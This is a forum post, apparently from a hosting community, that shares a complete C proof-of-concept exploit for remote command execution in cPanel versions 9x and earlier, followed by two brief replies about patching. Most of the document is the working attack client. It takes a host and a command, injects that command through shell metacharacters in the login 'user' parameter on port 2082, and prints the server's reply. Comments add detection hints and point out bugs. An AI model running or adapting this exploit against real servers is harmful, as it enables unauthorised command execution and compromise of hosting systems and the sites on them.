sunny

[exploit] cPanel Versions Below And Equal To 9x


Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability.

/*
 * cPanel <= 9x Remote Command Execution -- proof-of-concept client (Windows/Winsock).
 *
 * What the program does, as far as this listing shows: it opens one TCP
 * connection to port 2082 of the given host, sends a single GET request for
 * /login/ whose `user` query parameter carries the second command-line
 * argument, and prints the first chunk of whatever the server sends back.
 *
 * Defender notes:
 *  - The argument is wrapped in a URL-encoded pipe, double quote and backtick
 *    (`|`, %22, %60) inside the `user` parameter. Those shell metacharacters
 *    in a login username are the observable trait of this request, so they
 *    are what to look for in cPanel access logs or at a filtering proxy.
 *  - The request line built below carries no HTTP version token and no
 *    headers, which also sets it apart from normal browser traffic.
 *  - NOTE(review): presumably affected versions pass the `user` value to a
 *    shell without sanitising it; the server side is not shown here.
 *    The thread reports that an updated cPanel is not affected, so
 *    upgrading is the mitigation.
 */
// headers
#include <stdio.h>    // console output
#include <winsock2.h> // Winsock socket API
#include <stdlib.h>   // malloc
#include <string.h>   // strlen, strcat, strcpy
#pragma comment(lib,"ws2_32.lib") // MSVC link directive; with Dev-C++ link against "libws2_32.lib" instead
#define Port 2082 // TCP port the program connects to (cPanel)
#define SIZE 1024 // size of the receive buffer in bytes

/*
 * Conecta: initialise Winsock, create a TCP socket and connect it to Host:puerto.
 *
 * Host    - host name or dotted address, resolved with gethostbyname().
 * puerto  - TCP port in host byte order (converted with htons() below).
 * Returns the connected socket, or -1 after WSACleanup() when socket creation
 * or the connect call fails.
 *
 * NOTE(review): the WSAStartup() result is ignored; the gethostbyname() result
 * is dereferenced without a NULL check, so a name that does not resolve
 * crashes here; the failure value is a bare -1 rather than INVALID_SOCKET; and
 * the socket is not closed with closesocket() when the connect fails.
 */
SOCKET Conecta(char *Host, short puerto)
{
	/* Winsock start-up data */
	WSADATA wsaData;
	SOCKET Winsock; // client socket used for the outbound connection
	/* destination address and resolver result */
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;
	/* request Winsock version 2.2 */
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/* create a plain TCP/IPv4 socket (no protocol info, group 0, flags 0) */
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
	// bail out if the socket could not be created
	if(Winsock==INVALID_SOCKET)
	{
		/* release Winsock before reporting failure */
		WSACleanup();
		return -1;
	}
	/* fill in the destination address */
	Ip=gethostbyname(Host); // NOTE(review): may return NULL; not checked before Ip->h_addr below
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	// The first resolved address is turned into text and parsed back; the
	// round trip yields the same address it started from.
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
	/* connect to the target */
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/* release Winsock before reporting failure (the socket itself is not closed) */
		WSACleanup();
		return -1;
	}
	return Winsock;
}

/*
 * main: argv[1] is the host, argv[2] the string placed in the `user` parameter.
 *
 * Prints a banner, connects with Conecta(), sends one request and prints the
 * reply. Returns 0 on the usage message and on completion, 1 when the
 * connection fails.
 */
int main(int argc, char *argv[])
{
	/* connection to the target */
	SOCKET sock;
	/* fixed parts of the request: the 24-byte prefix and the 7-byte suffix
	   that surround argv[2]; %22 is a double quote and %60 a backtick */
	char evil_request[]="GET /login/?user=|%22%60";
	char evil_request2[]="%60%22\r";
	char *evil;
	/* receive buffer for the server's reply */
	char buf[SIZE];
	printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
	printf("\n");
	printf("\n-----------------------------------------------------\n");
	if(argc!=3) // expected invocation: cPanel_9x_rce.exe <host> <command>
	{
		printf("\n[+] Usage: %s <host> <command>\n",argv[0]);
		return 0;
	}
	printf("\n[+] Connecting  %s:%d...",argv[1],Port);
	/* open the connection */
	sock=Conecta(argv[1],Port);
	if(sock==-1)
	{
		printf("Error\n");
		return 1;
	}
	printf("OK");
	/* assemble the request: prefix + argv[2] + suffix + "\n\n".
	   24 is the prefix length; 12 covers the 7-byte suffix, the two newlines
	   and the terminating NUL with two bytes to spare.
	   NOTE(review): the malloc() result is not checked before strcpy(). */
	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
	strcpy(evil,evil_request);
	strcat(evil,argv[2]);
	strcat(evil,evil_request2);
	strcat(evil,"\n\n");
	// send the request; the send() result is ignored
	send(sock,evil,strlen(evil),0);
	// NOTE(review): recv() returns SOCKET_ERROR (-1) on failure, which makes
	// this write buf[-1]; a full read of SIZE bytes writes buf[SIZE], one past
	// the end of the array. Only this first chunk of the reply is ever read.
	buf[recv(sock,buf,SIZE,0)]='\0';
	// print whatever the server returned
	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
	WSACleanup();
	// NOTE(review): both calls below are invalid. buf is a stack array and
	// evil came from malloc(); LocalFree() is only for LocalAlloc() memory.
	// The socket is also never closed with closesocket().
	LocalFree(buf);
	LocalFree(evil);
	return 0;
}


interesting indeed but i don't think we could fix that ourselves since this is free hosting. but still interesting that you found this.


I have found it on some security portal. It is interesting to know that our faithful cPanel has some vulnerabilities. One more thing. While I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Xisto's case I am sure that we are secure :-)
